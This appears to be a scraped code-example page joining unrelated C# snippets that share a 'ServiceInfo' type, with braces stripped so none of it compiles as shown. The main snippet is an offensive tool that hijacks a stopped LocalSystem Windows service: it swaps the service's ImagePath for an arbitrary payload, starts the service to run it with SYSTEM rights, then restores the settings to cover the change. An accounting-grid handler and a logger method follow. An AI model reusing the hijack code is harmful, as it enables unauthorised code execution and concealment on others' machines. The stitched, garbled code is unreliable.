                    Console.WriteLine($"\n[>] Looking for a random service to execute our payload.");

                    Random r = new Random();
                    for (int i = 0; i < services.Length; i++)
                        int value = r.Next(0, services.Length);

                        // Check some values to select a service to use to trigger our paylaod
                        if (services[value].StartType == ServiceStartMode.Disabled && services[value].Status == ServiceControllerStatus.Stopped && services[value].ServicesDependedOn.Length == 0)
                            serviceInfo = GetServiceInfo(services[value].ServiceName, SCMHandle);

                            if (serviceInfo.startName.ToLower() == "localsystem")
                                Console.WriteLine($"    |-> Service {services[value].ServiceName} authenticated as {serviceInfo.startName}.");

                    serviceInfo = new ServiceInfo();

                    // If not service was found search for services with start mode manual, stopped without dependencies.
                    if (serviceInfo.displayName == null)
                        for (int i = 0; i < services.Length; i++)
                            int value = r.Next(0, services.Length);
                            // Check some values to select a service to use to trigger our paylaod (Manual Services)
                            if (services[value].StartType == ServiceStartMode.Manual && services[value].Status == ServiceControllerStatus.Stopped && services[value].ServicesDependedOn.Length == 0)
                                serviceInfo = GetServiceInfo(services[value].ServiceName, SCMHandle);

                                if (serviceInfo.startName.ToLower() == "localsystem")
                                    Console.WriteLine($"    |-> Service {services[value].ServiceName} authenticated as {serviceInfo.startName}.");
                    if (serviceInfo.displayName == "")
                        Console.WriteLine($"[!] No service found that met the default conditions, please select the service to run.");
                    Console.WriteLine($"\n[>] Checking if service {options.service} exists.");

                    bool found = false;
                    // Check if --server=value exits.
                    foreach (var service in services)
                        if (service.ServiceName == options.service)
                            found = true;

                    if (found)
                        serviceInfo = GetServiceInfo(options.service, SCMHandle);
                        if (serviceInfo.startName.ToLower() == "localsystem")
                            Console.WriteLine($"    |-> Service {options.service} authenticated as {serviceInfo.startName}.");
                            Console.WriteLine($"\n[!] The service {options.service} is authenticated {serviceInfo.displayName} aborting to not lose the account.");
                        Console.WriteLine($"    |-> Service not found {options.service}.");

                string previousImagePath = serviceInfo.binaryPathName;

                Console.WriteLine($"\n[>] Setting up payload.");

                string payload = options.payload;

                Console.WriteLine($"    |-> payload = {payload}");

                Console.WriteLine($"    |-> ImagePath previous value = {previousImagePath}.");

                // Modify the service with the payload
                Console.WriteLine($"    |-> Modifying ImagePath value with payload.");

                result = ChangeServiceConfig(serviceInfo.serviceHandle, SERVICE_NO_CHANGE, SERVICE_DEMAND_START, 0, payload, null, IntPtr.Zero, null, null, null, null);

                if (!result)
                    string errorMessage = new Win32Exception(Marshal.GetLastWin32Error()).Message;
                    Console.WriteLine("[!] ChangeServiceConfig failed. Error: {0}", errorMessage);

                Console.WriteLine($"\n[>] Starting service {serviceInfo.displayName} with new ImagePath.");

                result = StartService(serviceInfo.serviceHandle, 0, null);

                //Console.WriteLine($"    |-> Possible command execution completed.");

                // Wait 5 seconds before restoring the values
                Console.WriteLine($"\n[>] Waiting 5 seconds to finish.");

                Console.WriteLine($"\n[>] Restoring service configuration.");

                result = ChangeServiceConfig(serviceInfo.serviceHandle, SERVICE_NO_CHANGE, serviceInfo.startType, 0, previousImagePath, null, IntPtr.Zero, null, serviceInfo.startName, null, null);
                if (!result)
                    string errorMessage = new Win32Exception(Marshal.GetLastWin32Error()).Message;
                    Console.WriteLine("[!] ChangeServiceConfig failed. Error: {0}", errorMessage);
                    Console.WriteLine($"    |-> {serviceInfo.displayName} Log On => {serviceInfo.startName}.");
                    Console.WriteLine($"    |-> {serviceInfo.displayName} status => {serviceInfo.startType}.");
                    Console.WriteLine($"    |-> {serviceInfo.displayName} ImagePath => {previousImagePath}");
            catch (Exception ex)
                Console.WriteLine("\n[!] General Error: {0}\n", ex.Message);
 /// <summary>
 /// On cellvaluechange of dgvServiceVoucher
 /// </summary>
 /// <param name="sender"></param>
 /// <param name="e"></param>
 private void dgvServiceVoucher_CellValueChanged(object sender, DataGridViewCellEventArgs e)
         ServicesBll BllService = new ServicesBll();
         ServiceInfo infoService = new ServiceInfo();
         decimal decRate = 0;
         if (e.RowIndex != -1 && e.ColumnIndex != -1)
             if (e.ColumnIndex == dgvServiceVoucher.Columns["dgvcmbParticulars"].Index)
                 if (dgvServiceVoucher.Rows[e.RowIndex].Cells["dgvcmbParticulars"].Value != null && dgvServiceVoucher.Rows[e.RowIndex].Cells["dgvcmbParticulars"].Value.ToString() != string.Empty)
                     infoService = BllService.ServiceViewForRate(Convert.ToDecimal(dgvServiceVoucher.Rows[e.RowIndex].Cells["dgvcmbParticulars"].Value.ToString()));
                     decRate = infoService.Rate;
                     string strAmount = decRate.ToString();
                     if (strAmount != string.Empty)
                         dgvServiceVoucher.Rows[e.RowIndex].Cells["dgvtxtAmount"].Value = strAmount;
     catch (Exception ex)
         MessageBox.Show("SV 45 : " + ex.Message, "OpenMiracle", MessageBoxButtons.OK, MessageBoxIcon.Information);
Example #60
 public static void Debug(this ILogger logger, string message, Exception exception = null, ServiceInfo serviceInfo = null)
     FilteredLog(logger, LogLevel.Debug, message, exception, serviceInfo);